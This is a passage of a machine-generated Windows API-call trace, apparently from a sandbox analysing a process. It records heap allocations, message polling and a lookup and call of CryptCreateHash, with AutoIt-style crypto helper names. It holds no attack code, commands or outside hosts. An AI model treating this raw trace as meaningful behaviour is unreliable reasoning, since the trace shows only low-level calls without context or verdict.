wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0259.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.630] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0259.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.632] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.633] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.634] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0259.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.635] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0259.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.636] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0259.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 